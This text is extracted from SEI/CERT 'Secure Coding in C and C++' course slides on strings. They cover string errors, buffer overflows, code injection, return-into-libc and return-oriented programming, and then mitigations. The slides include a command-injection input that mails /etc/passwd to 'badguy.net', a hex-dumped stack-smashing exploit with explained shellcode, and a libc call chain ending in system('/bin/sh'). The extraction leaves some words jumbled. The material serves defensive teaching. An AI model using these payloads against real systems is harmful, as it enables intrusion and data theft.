01 Strings Fdsfds

Secure Coding in C and C++
Module 1, Strings
This material is approved for public release. Distribution is limited by the Software Engineering Institute to attendees.
2011 Carnegie Mellon University
2011 Carnegie Mellon University This material is distributed by the SEI only to course attendees for their own individual study. Except for the U.S. government purposes described below, this material SHALL NOT be reproduced or used in any other manner without requesting formal permission from the Software Engineering Institute at permission@sei.cmu.edu. This material was created in the performance of Federal Government Contract Number FA872105-C-0003 with Carnegie Mellon University for the operation of the Software Engineering Institute, a federally funded research and development center. The U.S. Government's rights to use, modify, reproduce, release, perform, display, or disclose this material are restricted by the Rights in Technical Data-Noncommercial Items clauses (DFAR 252-227.7013 and DFAR 252-227.7013 Alternate I) contained in the above identified contract. Any reproduction of this material or portions thereof marked with this legend must also reproduce the disclaimers contained on this slide. Although the rights granted by contract do not require course attendance to use this material for U S Government U.S. G t purposes, the th SEI recommends d attendance tt d t ensure proper understanding. to d t di THE MATERIAL IS PROVIDED ON AN AS IS BASIS, AND CARNEGIE MELLON DISCLAIMS ANY AND ALL WARRANTIES, IMPLIED OR OTHERWISE (INCLUDING, BUT NOT LIMITED TO, WARRANTY OF FITNESS FOR A PARTICULAR PURPOSE, RESULTS OBTAINED FROM USE OF THE MATERIAL, MERCHANTABILITY, AND/OR NON-INFRINGEMENT).
String Agenda
Strings Common errors using NTBS C Common errors using i basic_string String Vulnerabilities Mitigation Strategies Summary
Strings
Constitute most of the data exchanged between an end user and a software system
command-line command line arguments environment variables console input
Software vulnerabilities and exploits are caused by weaknesses in

string representation string management string manipulation
Null-Terminated Byte Strings 1

Strings are a fundamental concept in software engineering, but they are not a built-in type in C or C++.
l
length
o \0
Null-terminated byte strings (NTBS) consist of a contiguous sequence of characters terminated by and including the first null character. The C programming language supports the following types of nullterminated byte strings: single-byte character strings (type char) multibyte character strings (type char) wide character strings (type wchar_t)
Null-Terminated Byte Strings 2

Single-byte and multibyte character strings are both described as null-terminated byte strings.
Ap pointer to a single-byte g y or multibyte y character string gp points
to its initial character.

The length of the string is the number of bytes preceding the
null character.
Null-terminated byte strings are implemented as arrays of characters and are susceptible to the same problems as arrays. As a result, secure coding practices for arrays should also be applied to null-terminated byte strings.
Arrays
One of the problem with arrays is determining the number of elements:
void func(char s[]) { size_t num_elem = sizeof(s) / sizeof(s[0]); } Number of elements is 4 int main(void) { char str[] = "Bring on the dancing horses"; size_t num_elem = sizeof(str) / sizeof(str[0]); func(str); Number of elements is 28 }
The strlen() function can be used to determine the length of a (properly) null-terminated byte string but not the space available in an array.
7
Byte Character Types

The three types char, signed char, and unsigned char are collectively called the character types. types Compilers have the latitude to define char to have the same range, representation, and behavior as either signed char or unsigned char. Irrespective of the choice made, char is a distinct type type.
Wide Strings
A wide string is a contiguous sequence of wide characters terminated by and including the first null wide character. character A pointer to a wide string points to its initial (lowest addressed) wide character. The length of a wide string is the number of wide characters preceding the null wide character.
Character Type Philosophy

Although not stated in one place, the C standard uses the following philosophy for choosing character types: signed char and unsigned char
suitable for small integer values
plain char
the type of each element of a string literal used for character data (where signedness has little
meaning) as opposed to integer data
10
int
Used for data that could be either EOF (a negative value) or character data interpreted as unsigned char and then converted to int.
00
00
00
FF
Consequently, returned by fgetc(), getc(), getchar(), and
ungetc(). Also, accepted by the character handling functions from <ctype.h>, because they might be passed the result of fgetc() et al.
The type of a character constant. Its value is that of a plain char converted to int. In C++, a character literal that contains only one character has type char
11
unsigned char
Used internally for string comparison functions, even though these operate on character data. As a result, result the result of a string comparison does not depend on whether plain char is signed. Used for situations where the object being manipulated might be of any type and it is necessary to access all bits of that object, as with fwrite().
12
Use Plain char for Character Data 1

The CERT C Secure Coding Standard recommends STR04-C. Use plain char for characters in the basic character set set for compatibility with standard string handling functions. In most cases, the only portable operators on plain char types are assignment and equality operators (=, ==, != ). An exception is the translation to and from digits digits. For example, if the char c is a digit, c - '0' is a value between 0 and 9.
13

size_t len; char cstr[] = "char string"; signed char scstr[] = "signed char string"; unsigned char ucstr[] = "unsigned char"; len = strlen(cstr); /* warns when char is unsigned */ len = strlen(scstr); /* warns when char is signed */ len = strlen(ucstr);
14

Compiling at high warning levels in compliance with [MSC00-C] results in warnings when converting from
unsigned char[] to const char * when char is signed signed char[] to const char * when char is unsigned
Casts are required to eliminate these warnings, but excessive casts can make code difficult to read and hide legitimate warning messages. If this code were compiled using a C++ compiler, conversions g char[] [] to const char * and from signed g from unsigned char[] to const char * would be flagged as errors requiring casts.
15
std::basic_string
Standardization of C++ has promoted the standard template class std::basic_string. g class represents p a sequence q of The basic_string characters.
Supports sequence operations as well as string operations such as
search and concatenation.

Is parameterized by character type string is a typedef for basic_string<char> wstring is a typedef for basic_string<wchar_t>
16
Strings in C++
The basic_string class is less prone to security vulnerabilities than null-terminated byte strings. Null-terminated Null terminated byte strings are still a common data type in C++ programs. The use of null-terminated byte strings in C++ program is unavoidable, except in rare circumstances:
no string t i literals lit l no interaction with existing libraries that accept null-
terminated byte strings
17
String Agenda
18
Common String Manipulation Errors

Programming with null-terminated byte strings, in C or C++, is error prone. Common errors include
improperly bounded string copies null-termination errors truncation write outside array bounds off-by-one ff b errors improper data sanitization
19
Bounded String Copies

This program has undefined behavior if more than 8 characters are entered at the prompt. This example #include <stdio.h> p uses only y interfaces present in #include <stdlib.h> void get_y_or_n(void) { char response[8]; printf("Continue? [y] n: "); gets(response); if (response[0] == 'n') exit(0); return; The CERT C Secure Coding Standard Rule MSC34-C disallows the use of deprecated or }
obsolescent functions function.
20
C99, although the gets() function has been deprecated in C99 and eliminated from C1X.
10
The gets() Function

char *gets(char *dest) { int c = getchar(); The gets() function has no way to specify limit on number of characters to read read.
char *p = dest; while (c != EOF && c != '\n') { *p++ = c; c = getchar(); } *p = '\0'; return dest; }
21
C++ Unbounded Copy

Inputting more than 11 characters in this C++ program results in an out-of-bounds write: #include <iostream> using namespace std; int main(void) { char buf[12]; cin >> buf; ; cout << "echo: " << buf << endl; }
22
11
Simple Solution
Set width field to maximum input size. #include <iostream> The extraction operation be limited to a i td can using namespace std; specified number of
int main(void) { char buf[12]; cin.width(12); cin >> buf; cout << "echo: " }
23
characters if ios_base::width is set to a value > 0.
After a call to the extraction operation, the value of the width is reset to 0 0. id h field fi ld i tt
<< buf << endl;
Simple Solution
Test the length of the input using strlen() and dynamically allocate the memory. int main(int argc, char *argv[]) { char *buff = malloc(strlen(argv[1])+1); if (buff != NULL) { strcpy(buff, argv[1]); printf("argv[1] = %s.\n", buff); } else { /* Couldn't get the memory - recover */ } return 0; }
24
12
Copying and Concatenation

It is easy to make errors when copying and concatenating strings because standard functions do not know the size of the destination buffer buffer. int main(int argc, char *argv[]) { char name[2048]; strcpy(name, argv[1]); strcat(name, " = "); strcat(name, argv[2]); ... }
25
Null-Termination Errors
Another common problem with null-terminated byte strings is a failure to properly null terminate.
int main(void) i i ( id) { char a[16]; char b[16]; char c[32]; strncpy(a, "0123456789abcdef", sizeof(a)); strncpy(b, "0123456789abcdef", sizeof(b)); strncpy(c, a, sizeof(c));
}
Neither a[] nor b[] is properly terminated.

26
13
From ISO/IEC 9899:1999

The strncpy() function char *strncpy(char * restrict s1, const char * restrict s2, s2 size_t n); copies not more than n characters (characters that follow a null character are not copied) from the array pointed to by s2 to the array pointed to by s1. Thus, if f there is no null character in the first f n characters of the array pointed to by s2, the result will not be null terminated.
27
String Truncation
Functions that restrict the number of bytes are often recommended to mitigate buffer overflow vulnerabilities. vulnerabilities
strncpy() instead of strcpy() fgets() instead of gets() snprintf() instead of sprintf()
Strings that exceed the specified limits are truncated. Truncation T ti results lt in i al loss of fd data t and di in some cases leads to software vulnerabilities.
28
14
Write Outside Array Bounds

int main(int argc, char *argv[]) { int i = 0; char buff[128]; Because null nullchar *arg1 = argv[1]; terminated byte strings while (arg1[i] != '\0' ) { are character buff[i] = arg1[i]; arrays, it is i++; possible to perform an } insecure buff[i] [ ] = '\0'; \ ; string i printf("buff = %s\n", buff); operation without }
invoking a function.
29
Off-by-One Errors
Can you find all the off-by-one errors in this program? int main(void) { int i; char source[10]; strcpy(source, "0123456789"); char *dest = malloc(strlen(source)); for (i=1; i <= 11; i++) { dest[i] = source[i]; } dest[i] = '\0'; printf("dest = %s", dest); }
30
15
Improper Data Sanitization

An application inputs an email address from a user and passes it as an argument to a complex subsystem (e.g., a command shell) [Viega 03]. sprintf(buffer, "/bin/mail / / %s < / /tmp/email", p/ , addr ); system(buffer); The risk is that the user enters the following string as an email address:
bogus@addr.com; cat /etc/passwd | mail some@badguy.net
This is an example p of command injection. j
[Viega 03] Viega, J., & Messier, M. Secure Programming Cookbook for C and C++: Recipes for Cryptography, Authentication, Networking, Input Validation & More. Sebastopol, CA: O'Reilly, 2003.
31
Injection
There are many types of injection:
Command injection Format string injection SQL injection XML/Xpath injection Cross-site scripting (XSS)
Enabled by not properly sanitizing a string that is then interpreted by a complex subsystem (such as an HTML parser)
32
16
Black Listing
Replaces dangerous characters in input strings with underscores or other harmless characters
requires the programmer to identify all dangerous
characters and character combinations may be difficult without having a detailed understanding of the program, process, library, or component being called may be possible to encode or escape dangerous characters h t after ft successfully f ll bypassing b i bl black k li list t checking
33
White Listing
Defines a list of acceptable characters and removes any characters that are unacceptable The list of valid input values is typically a predictable predictable, well-defined set of manageable size. White listing can be used to ensure that a string only contains characters that are considered safe by the programmer.
34
17
String Agenda
35
basic_string class
Size is not an issue string str1 = "hello, world."; size t size = str1 size_t str1.size(); size(); Concatenation is not an issue string str1 = "hello, "; string str2 = "world"; string str3 = str1 + str2;
36
18
basic_string iterators
Iterators can be used to iterate over the contents of a string:
string::iterator i; for (i=str.begin(); i != str.end(); ++i) { cout << *i; }
References, pointers, and iterators referencing string objects are invalidated by operations that modify the string which can lead to errors string, errors.
37
Invalid Iterator
The following code attempts to sanitize an email address before passing it to a command shell.
char input[]; string email; string::iterator loc = email.begin(); // copy into string converting ";" to " " for (size_t i=0; i <= strlen(input); i++) { if (input[i] != ';') { Iterator loc email.insert(loc++, input[i]); invalidated after first call } to insert(). else email.insert(loc++, ' '); }
38
19
Valid Iterator
char input[]; string email; string::iterator g loc = email.begin(); g // copy into string converting ";" to " " for (size_t i=0; i <= strlen(input); ++i) { if (input[i] != ';') { loc = email.insert(loc, input[i]); } else l l loc = email.insert(loc, il i t(l ' ') '); ++loc; The value of the iterator loc is }
updated as a result of each insertion.
39
basic_string Element Access

The index operator[] is unchecked.
string bs("01234567"); size_t i = f(); b [i] = '\0' bs[i] '\0';
The at() method behaves in a similar fashion to the index operator[] but throws an out_of_range exception if pos >= size().
string bs("01234567"); try { size_t i = f(); bs.at(i) ( ) = '\0'; } catch (...) { cerr << "Index out of range" << endl; }
40
20
Getting a Null-Terminated Byte String

Often necessary for use with
a standard library function that takes a char * legacy code that expects a char *
string str = x; cout << strlen(str.c_str()); The c_str() method returns a const value.
Calling free() or delete on the returned string is an
error. Modifying the returned string can also lead to an error.
If you need to modify the string, make a copy first and then modify the copy.
41
String Agenda
Strings Common errors using NTBS C Common errors using i basic_string String Vulnerabilities
Program Stack Buffer Overflow Code Injection Arc Injection
Mitigation Strategies Summary

42
21
Program Stack
The stack supports nested invocation calls. Information pushed on the t k as a result lt of f a function f ti stack call is called a frame. b() {} a() { b(); } main() { a(); }
Low memory Unallocated Stack frame for b() Stack frame for a() Stack frame for main() High memory
43
A stack frame is created for each subroutine and destroyed upon return.
Stack Frames
A program stack is used to keep track of program execution and state by storing
the return address in the calling function actual arguments to the function local variables of automatic storage duration
The address of the current frame is stored in a register (for example, EBP on Intel architectures). The frame pointer is used as a fixed point of reference within the stack. The stack is modified during
function calls function initialization return from a function
44
22
Notation
There are two notations for Intel instructions.
Microsoft uses the Intel notation (show here). GNU C uses AT&T syntax. syntax
mov $4, %eax mov eax, 4
// ATT&T Notation // Intel Notation
Both of these instructions move the immediate value 4 into the EAX register
45
Function Calls
void function(int arg1, int arg2);
Push 2nd arg on stack
function(4, 2); push 2 push 4 call function (411A29h)
Push 1st arg on stack
Push the return address on stack p to and j jump address
46
23
Function Initialization
void function(int arg1, int arg2) {

push ebp mov ebp, esp sub esp, 44h Saves the frame pointer Frame pointer for subroutine is set to current stack pointer Allocates space for local variables
ebp: extended base pointer esp: extended stack pointer

47
Function Return
return(); mov esp, ebp pop ebp ret
Restores the frame pointer Pops return address off the stack and transfers control to that location Restores the stack pointer

48
24
Return to Calling Function
function(4, 2); push 2 push 4 call function (411230h) add esp,8
Restores stack pointer

49
Sample Program
bool IsPasswordOK(void) { char Password[12]; // Memory storage for pwd gets(Password); // Get input from keyboard return 0 == strcmp(Password, "goodpass"); } int main(void) { bool PwStatus; // puts("Enter Password:"); // PwStatus=IsPasswordOK(); // if (!PwStatus) { puts("Access denied"); // exit( 1); exit(-1); // } else puts("Access granted");// }
Password status Print Get and check password Print Terminate program Print
50
25
Sample Program Runs

Run #1 Correct Password
Run #2 Incorrect Password
51
Stack Before Call to IsPasswordOK()

Code
int main(void) { bool PwStatus; puts("Enter Password:"); PwStatus=IsPasswordOK(); if (!PwStatus) { puts("Access denied"); exit(-1); } else puts("Access granted"); }
EIP
Stack
ESP Storage for PwStatus (4 bytes) Caller EBP Frame Ptr OS (4 bytes) Return Addr of main OS (4 Bytes)
52
26
Stack During IsPasswordOK() Call

Code
EIP puts("Enter Password:"); PwStatus=IsPasswordOK(); PwStatus IsPasswordOK(); if (!PwStatus) { puts("Access denied"); exit(-1); } else puts("Access granted");
Stack
ESP Storage for Password (12 Bytes) Caller EBP Frame Ptr main (4 bytes) Return Addr Caller main (4 Bytes) Storage for PwStatus (4 bytes) Caller EBP Frame Ptr OS (4 bytes) Return Addr of main OS (4 Bytes)
bool IsPasswordOK(void) { char Password[12]; gets(Password); return 0 == strcmp(Password, "goodpass"); }
Note: The stack grows and shrinks as a result of function calls made by IsPasswordOK(void).
53
Stack After IsPasswordOK() Call

Code
EIP
puts("Enter Password:"); PwStatus = IsPasswordOk(); if (!PwStatus) { puts("Access denied"); exit(-1); } else puts("Access granted");
Storage for Password (12 Bytes)
Stack
ESP
Caller EBP Frame Ptr main (4 bytes) R t Return Add Addr C Caller ll main i (4 B Bytes) t ) Storage for PwStatus (4 bytes) Caller EBP Frame Ptr OS (4 bytes) Return Addr of main OS (4 Bytes)
54
27
String Agenda
Strings Common errors using NTBS Common errors using basic_string basic string String Vulnerabilities
Program stacks Buffer overflows Code Injection Arc Injection
55
What Is a Buffer Overflow?

A buffer overflow occurs when data is written outside of the boundaries of the memory allocated to a particular data structure.
16 Bytes of Data
Source Memory Destination Memory Copy Operation
Allocated Memory (12 Bytes)
Other Memory
56
28
Buffer Overflows
Are caused when buffer boundaries are neglected and unchecked Can occur in any memory segment Can be exploited to modify a
variable data pointer function pointer return address on the stack
Smashing the Stack for Fun and Profit (Aleph One, Phrack 4914, 1996) provides the classic description of buffer overflows.
57
Smashing the Stack

Occurs when a buffer overflow overwrites data in the memory allocated to the execution stack. Successful exploits can overwrite the return address on the stack, allowing execution of arbitrary code on the targeted machine. This is an important class of vulnerability because of the
occurrence frequency f potential consequences
58
29
The Buffer Overflow 1

What happens if we input a password with more than 11 characters?
59
The Buffer Overflow 2

Stack
bool IsPasswordOK(void) { EIP char Password[12]; gets(Password); return 0 == strcmp(Password, "goodpass"); }
Return Addr Caller main (4 Bytes) 7890 Storage for Password (12 Bytes) 123456789012
ESP
Caller EBP Frame Ptr main (4 bytes) 3456
The return address and other data on the stack is overwritten because the memory space allocated for the password can only hold a maximum of 11 characters plus the null terminator.
Storage for PwStatus (4 bytes) \0 Caller EBP Frame Ptr OS (4 bytes) Return Addr of main OS (4 Bytes)
60
30
The Vulnerability
A specially crafted string 1234567890123456j*! produced the following result.
What happened?
61
What Happened?
1234567890123456j*! overwrites 9 bytes of memory on the stack, changing the callers return address, skipping lines 3-5, and starting execution at line 6.
Line 1 2 3 4 5 6 Statement puts("Enter Password:"); PwStatus=ISPasswordOK(); if (!PwStatus) puts("Access denied"); exit(-1); else puts("Access granted");
Stack
Storage for Password (12 Bytes) 123456789012 Caller EBP Frame Ptr main (4 bytes) 3456 Return Addr Caller main (4 Bytes) W*! (return to line 6 was line 3) Storage for PwStatus (4 bytes) \0 Caller EBP Frame Ptr OS (4 bytes) Return Addr of main OS (4 Bytes)
Note: This vulnerability also could have been exploited to execute arbitrary code contained in the input string.
62
31
String Agenda
Program stacks Buffer overflows Code Injection Arc Injection
63
Question
Q: What is the difference between code and data? A: Absolutely nothing.
64
32
Code Injection
Attacker creates a malicious argumenta specially crafted string that contains a pointer to malicious code provided by the attacker attacker. When the function returns, control is transferred to the malicious code.
Injected code runs with the permissions of the vulnerable
program when the function returns. Programs running with root or other elevated privileges are normally targeted.
65
Malicious Argument
Must be accepted by the vulnerable program as legitimate input. The argument, argument along with other controllable inputs inputs, must result in execution of the vulnerable code path. The argument must not cause the program to terminate abnormally before control is passed to the malicious code.
66
33
./vulprog < exploit.bin

The get password program can be exploited to execute arbitrary code by providing the following binary data file as input:
000 010 020 030 040 31 32 33 34 35 36 37 38-39 30 31 32 33 34 35 36 "1234567890123456" 37 38 39 30 31 32 33 34-35 36 37 38 E0 F9 FF BF "789012345678a +" 31 C0 A3 FF F9 FF BF B0-0B BB 03 FA FF BF B9 FB "1+ ++ +v" F9 FF BF 8B 15 FF F9 FF-BF CD 80 FF F9 FF BF 31 " + +- +1" 31 31 31 2F 75 73 72 2F-62 69 6E 2F 63 61 6C 0A "111/usr/bin/cal
"
This exploit is specific to Red Hat Linux 9.0 and GCC.

67
Mal Arg Decomposed 1

The first 16 bytes of binary data fill the allocated storage space for the password.
000 010 020 030 040
31 37 31 F9 31
32 38 C0 FF 31
33 39 A3 BF 31
34 30 FF 8B 2F
35 31 F9 15 75
36 32 FF FF 73
37 33 BF F9 72
38 34 B0 FF 2F
39 35 0B BF 62
30 36 BB CD 69
31 37 03 80 6E
32 38 FA FF 2F
33 E0 FF F9 63
34 F9 BF FF 61
35 FF B9 BF 6C
36 BF FB 31 0A
"1234567890123456" "789012345678a +" "1+ ++ +v" " + +- +1" "111/usr/bin/cal "
NOTE: The version of the GCC compiler used allocates stack data in multiples of 16 bytes.
68
34
000 010 020 030 040
31 37 31 F9 31
32 38 C0 FF 31
33 39 A3 BF 31
34 30 FF 8B 2F
35 31 F9 15 75
36 32 FF FF 73
37 33 BF F9 72
38 34 B0 FF 2F
39 35 0B BF 62
30 36 BB CD 69
31 37 03 80 6E
32 38 FA FF 2F
33 E0 FF F9 63
34 F9 BF FF 61
35 FF B9 BF 6C
36 BF FB 31 0A
"1234567890123456" "789012345678a +" "1+ ++ +v" " + +- +1" "111/usr/bin/cal "
The ne next bytes binary data fill the storage allocated b by t 12 b tes of binar the compiler to align the stack on a 16-byte boundary.
69
000 010 020 030 040
31 37 31 F9 31
32 38 C0 FF 31
33 39 A3 BF 31
34 30 FF 8B 2F
35 31 F9 15 75
36 32 FF FF 73
37 33 BF F9 72
38 34 B0 FF 2F
39 35 0B BF 62
30 36 BB CD 69
31 37 03 80 6E
32 38 FA FF 2F
33 E0 FF F9 63
34 F9 BF FF 61
35 FF B9 BF 6C
36 BF FB 31 0A
"1234567890123456" "789012345678a +" "1+ ++ +v" " + +- +1" "111/usr/bin/cal "
This value overwrites the return address on the stack to reference injected code. f
70
35
Malicious Code
The object of the malicious argument is to transfer control to the malicious code.
may be included in the malicious argument (as in this
example) may be injected elsewhere during a valid input operation can perform any function that can otherwise be programmed may simply open a remote shell on the compromised machine (as a result, is often referred to as shellcode)
71
Sample Shell Code

xor %eax,%eax #set eax to zero mov %eax,0xbffff9ff #set to NULL word mov $0xb,%al #set code for execve mov $0xbffffa03,%ebx #ptr to arg 1 mov $0xbffff9fb,%ecx #ptr to arg 2 mov 0xbffff9ff,%edx #ptr to arg 3 int $80 # make system call to execve arg g 2 array y p pointer array y char * []={0xbffff9ff, "1111"}; "/usr/bin/cal\0"
72
36
Create a Zero
Create a zero value. Because the exploit cannot contain null characters until the last byte, the null pointer must be set by the exploit code.
xor %eax,%eax #set eax to zero mov %eax,0xbffff9ff # set to NULL word
Use it to null terminate the argument list. This is necessary because an argument to a system call consists of a list of pointers terminated by a null pointer.
73
Shell Code
xor %eax,%eax #set eax to zero mov %eax,0xbffff9ff #set to NULL word mov $0xb,%al #set code for execve
The system call is set to 0xb, which equates to the execve() system call in Linux.
74
37
Shell Code
mov $0xb,%al #set code for execve sets up three mov $0xbffffa03,%ebx #arg 1 ptr arguments for the execve() $0xbffff9fb %ecx #arg 2 ptr mov $0xbffff9fb,%ecx call mov 0xbffff9ff,%edx #arg 3 ptr arg 2 array pointer array points to a NULL byte char * []={0xbffff9ff "1111"}; "/usr/bin/cal\0"
Data for the arguments is also included in the shell code.
changed to 0x00000000 terminates ptr array and used for arg3

75
Shell Code
mov mov mov mov int $0xb,%al #set code for execve $0xbffffa03,%ebx #ptr to arg 1 $0xbffff9fb,%ecx #ptr to arg 2 0xbffff9ff,%edx #ptr to arg 3 $80 # make system call to execve
The execve() system call results in execution of the Linux calendar program.
76
38
Null Characters
The gets() function also has an interesting property in that it reads characters from the input stream pointed to by stdin until end-of-file is encountered or a new-line character is read. Any new-line character is discarded, and a null character is written immediately after the last character read into the array. As a result, there might be null characters embedded in the string returned by gets() if for example input is redirected from a file. Similarly data read by the fgets() function may also contain Similarly, null characters. This issue is further document in The CERT C Secure Coding Standard rule FIO37-C. Do not assume that fgets() returns a nonempty string when successful.
77
String Agenda
Buffer overflows Program stacks Code Injection Arc Injection
78
39
Arc Injection (return-into-libc)

Arc injection transfers control to code that already exists in the programs memory space.
refers to how exploits insert a new arc (control-flow (control flow
transfer) into the programs control-flow graph as opposed to injecting code can install the address of an existing function (such as system() or exec(), which can be used to execute programs on the local system
allows ll f for even more sophisticated hi ti t d attacks tt k
79
Vulnerable Function
#include <string.h> int get_buff(char *user_input, size_t size){ char buff[40]; memcpy(buff, user_input, size); return 0; } int main(void) { /* */ get_buff(tainted_char_array, tainted_size); /* */ }
80
40
Exploit
Overwrites return address with address of existing function. Creates stack frames to chain function calls calls. Recreates original frame to return to program and resume execution without detection.
81
Resultofmemcpy()in get_buff()
BeforeOverflow
esp ebp buff[40] ebp (main) return addr(main) stack frame main esp ebp
AfterOverflow
buff[40] ebp (frame 2) seteuid() address (leave/ret)address 0 ebp (frame 3) system()address (leave/ret)address const *char "/bin/sh"
Frame1
return 0;
mov esp,ebp esp ebp pop ebp ret
Frame2
ebp (orig) return addr(main)
Original Frame
82
41
get_buff() Returns1
esp ebp buff[40] ebp (frame 2) seteuid() address (leave/ret)address 0 ebp (frame 3) system()address (leave/ret)address const *char "/bin/sh"
Frame1
return 0;
eip mov esp,ebp esp ebp pop ebp ret
Frame2
Original Frame
83
get_buff() Returns 2
esp
ebp
Frame1
return 0;
Frame2
Original Frame
84
42
get_buff() Returns3
esp
Frame1
ebp
return 0;
Frame2
Original Frame
85
get_buff() Returns4
ret instruction transferscontrol to seteuid()
esp ebp
Frame1
return 0;
Frame2
Original Frame
86
43
seteuid() Returns1
seteuid() return transferscontrolto leave/returnsequence
esp ebp buff[40] ebp (frame 2) seteuid() address (leave/ret)address 0 ebp (frame 3) system()address (leave/ret)address const *char "/bin/sh"
Frame1
return 0;
Frame2
Original Frame
87
seteuid() Returns2
Frame1
esp
ebp
return 0;
Frame2
Original Frame
88
44
seteuid() Returns3
Frame1
esp
return 0;
eip mov esp,ebp esp ebp pop ebp ret ebp
Frame2
Original Frame
89
seteuid() Returns4
ret() instruction transferscontrol to system()
Frame1
return 0;
esp
Frame2
ebp
Original Frame
90
45
system() Returns1
system() returnscontrolto leave/return sequence
Frame1
return 0;
Frame2
esp
ebp
Original Frame
91
system() Returns2
Originalesp restored!
Frame1
return 0;
eip mov esp esp,ebp ebp pop ebp ret esp
Frame2
ebp
Original Frame
92
46
system() Returns3
Originalebp restored!
Frame1
return 0;
eip mov esp,ebp esp ebp pop ebp ret esp
Frame2
Original Frame
93
system() Returns1
ret instruction returnscontrol tomain()
Frame1
return 0;
Frame2
Original Frame
94
47
Why is This Interesting?

An attacker can chain together multiple functions with arguments. Exploit consists entirely of existing code
No code is injected. Memory based protection schemes cannot prevent arc
injection. Larger overflows are not required.

The original frame can be restored to prevent detection detection.
95
Return-oriented Programming
The return-oriented programming exploit technique is similar to arcinjection, but instead of returning to functions the exploit code returns to sequences of instructions followed by a return instruction. Any such useful sequence of instructions is referred to as a gadget. A Turing-complete set of gadgets shave been identified for the x86 architecture [Shacham 2007], allowing arbitrary programs to be written in the return-oriented language. A Turing-complete library of code gadgets using snippets of the Solaris libc, a general purpose programming language, and a compiler for constructing return-oriented exploits has also been developed [Buchanan 2008] . Consequently, there is an assumed risk that return-oriented programming exploits could be effective on other architectures as well.
96
48
Gadgets
Gadgets form the programming language. Each gadget specifies certain values to be placed on the stack that make use of one or more sequences q of instructions in the code segment. Gadgets perform well-defined operations, such as a load, an xor, or a jump. Return-oriented programming consists in putting gadgets together that will perform the desired operations. Gadgets are executed e ec ted by b a return ret rn instruction instr ction with ith the stack pointer referring to the address of the gadget.
97
Gadget: Immediate Constants

pop %ebx; ret mov $0xdeadbeef, $0 d db f % %ebx b eip esp 0 d db f 0xdeadbeef
Instructions can encode constants Return-oriented Return oriented equivalent:

Store on the stack Pop into register to use
98
49
Gadget: Storing to Memory

High memory
Low memory
Because of the immediate offset in the movl instruction, the address in %edx must be 24 bytes less than the address we wish to write to.
The gadget movl %eax, 24(%edx); ret can be used to store the contents of %eax into memory. The address to be written is copied into %edx using the immediate constant gadget.
99
Gadget: Unconditional Branch

pop %esp; ret j jmp + 4 eip esp
Ordinary programming:
set eip to new value
Return-oriented equivalent:
set esp to new value
Conditional branches are possible but trickier.

100
50
Iteration
An unconditional branch can be used to branch to an earlier gadget on the stack, resulting in an infinite loop. loop Conditional iteration can be implemented by a conditional branch out of the loop.
101
Return-oriented Programming
Shachams paper contains a more complete tutorial on return-oriented programming [Shacham 2007]. While return-oriented return oriented programming might seem very complex, this complexity can be abstracted behind a programming language and compiler making this a viable technique for writing exploits.
102
51
String Agenda

103
Mitigation Strategies
Include strategies designed to
prevent buffer overflows from occurring detect buffer overflows and securely recover without
allowing the failure to be exploited (eg stack canaries)
104
52
Input Validation
Buffer overflows are often the result of unbounded string or memory copies. Buffer overflows can be prevented by ensuring that input data does not exceed the size of the smallest buffer in which it is stored. int myfunc(const char *arg) { char buff[100]; if ( (strlen(arg) ( g) >= sizeof(buff)) ( )) { abort(); } }
105
String Handling
The CERT C Secure Coding Standard rule STR01-C. Adopt and implement a consistent plan for managing strings recommends selecting a single approach to handling character strings and applying it consistently across a project. Otherwise, the decision is left to individual programmers who are likely to make different, inconsistent choices.
106
53
Memory Management Models

String handling functions can be categorized based on how they manage memory. There are three basic models:
Caller allocates and frees (C99, OpenBSD, C1X Annex K) Callee allocates, caller frees (ISO/IEC TR 24731-2) Callee allocates and frees (C++ std::basic_string)
107
Memory Management Models

It could be argued whether the first model is more secure than the second model or vice versa. The first model makes it clearer when memory needs to be freed, and is more likely to prevent leaks The second model make sure there is enough memory available (except when a call to malloc() fails). The third memory management mode mode, where the callee both allocates and frees storage is the most secure of the three solutions but is only available in C++.
108
54
Caller Allocates, Caller Frees

Caller allocates, caller frees is implemented by
the C99 string handling functions defined in
<string.h>
the OpenBSD functions strlcpy() and strlcat() the C1X Annex K bounds-checking interfaces.
Memory can be statically or dynamically allocated prior to invoking these functions, making this model optimally efficient. efficient
109
Bounds-checking Interfaces
The bounds-checking interfaces are alternative library functions that promote safer, more secure programming. programming The alternative functions verify that output buffers are large enough for the intended result and return a failure indicator if they are not. Data is never written past the end of an array. All string t i results lt are null ll t terminated. i t d
110
55
History
The C1X Annex K functions were created by Microsoft to help retrofit its existing, legacy code base in response to numerous, well-publicized security incidents over the past decade. These functions were subsequently proposed to the ISO/IEC JTC1/SC22/WG14 international standardization working group for the programming language C for standardization. These functions were published as ISO/IEC TR 24731-1 [ISO/IEC TR 24731-1:2007] and then later incorporated in C1X in the form of a set of optional p extensions specified p in a normative annex.
111
Goals
Mitigate risk of
buffer overrun attacks default protections associated with program program-created created file
Do not produce unterminated strings. Do not unexpectedly truncate strings. Preserve the null-terminated string data type. Support pp compile-time p checking. g Make failures obvious. Have a uniform function signature.
112
56
Reading from stdin using gets_s()

#define __STDC_WANT_LIB_EXT1__ 1 #include <stdio.h> #include <stdlib.h> void get_y_or_n(void) { char response[8]; size_t len = sizeof(response); printf("Continue? [y] n: "); gets_s(response, len); if (response[0] == n) There is implementation exit(0); defined behavior (typically } abort) if 8 characters or more are input. This program is similar to the gets() example, except that the array bounds are checked.
113
Runtime-constraints
Most bounds-checked functions, upon detecting an error such as invalid arguments or not enough room in an output buffer, call a special runtime-constraint handler function. This function might print an error message and/or abort the program. The programmer can control which handler function is called via the set_constraint_handler_s() function, and can make the handler simply return if desired.
114
57
set_constraint_handler_s()
The set_constraint_handler_s() function sets the function (handler) called when a library function detects a runtime-constraint violation. The behavior of the default handler is implementation-defined, and it may cause the program to exit or abort. There are two predefined handlers (in addition to the default handler)
abort_handler_s() writes a message on the standard error
stream and then calls abort(). ignore_handler_s() function does not write to any stream. It simply returns to its caller.
115
Runtime-constraint Handler
If the handler simply returns, the function that invoked the handler indicates a failure to its caller using its return value. g that install a handler that returns must check the Programs return value of each call to any of the bounds checking functions and handle errors appropriately. The CERT C Secure Coding Standard Recommendation ERR03-C. Use runtime-constraint handlers when calling functions defined by TR24731-1 recommends installing a runtime-constraint handler to eliminate the implementationp defined behavior.
116
58
Reading from stdin using gets_s()

